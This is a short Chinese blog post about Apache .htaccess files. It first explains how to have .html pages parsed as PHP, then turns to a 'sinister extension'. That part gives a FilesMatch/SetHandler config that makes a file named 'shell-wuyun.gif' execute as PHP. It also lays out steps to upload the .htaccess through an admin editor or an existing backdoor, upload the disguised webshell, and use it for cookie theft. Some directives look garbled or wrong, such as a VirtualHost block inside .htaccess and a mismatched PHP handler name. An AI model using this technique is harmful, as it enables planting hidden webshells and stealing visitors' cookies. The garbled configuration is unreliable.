支持环境:apache(其他的ngnix自己可以扩展思路)
文件:.htacess文件
情节:正常情况HTML页面中运行php代码的基本方法是将.html和.htm修改成.php。如果你已经有许多包含PHP代码的HTML的页面,同时还不想逐个修改它们扩展名。你可以在htaccess文件中配置一下,让所有的页面都当作PHP文件解释。
方法如下:
打开文本编辑器,windows上的笔记本,Linux上的vi编辑器,在htaccess文件中添加如下行。
AddHandler x-mapp-php5 .html .htm
如果你想使用PHP 5.4而不是PHP 5.2,你可以添加下面的这一行。
AddHandler x-mapp-php6 .html .htm
这样就会指定所有扩展名为.html和.htm的文件都会经过PHP解释执行。根据需要添加上面的代码后,将文件保存即可。
腹黑扩展:
利用.:htaccess文件来执行php脚本达到图像文件以php执行,比如可以将cookiee suffering相关代码写入php文件,再把图片嵌入到一个页面当中。
利用步骤:
1.创建一个htaccess文件:
代码内容:(加入红色部分即可,其余可以不要复制)
<VirtualHost *:80>
DocumentRoot /www/web/bd
ServerName baidu.com
RewriteEngine on
RewriteRule ^(.*)$ http://www.baidu.com$1 [R=301,L]
</VirtualHost>
<FilesMatch “-wuyun.gif”>
SetHandler application/x-httpd-php
</FilesMatch>
<Directory /www/web/jcrs055>
Options FollowSymLinks
AllowOverride All
Order allow,deny
Allow from all
</Directory>
2.从后台编辑器或后门中上传htaccess文件.
3.上传shell-wuyun.gif
4.上传后,如果访问这个图片会以php文件执行。
赏
支付宝扫码打赏
微信扫码打赏
支付宝扫码打赏
微信扫码打赏
如果本文对你有帮助,欢迎打赏本站
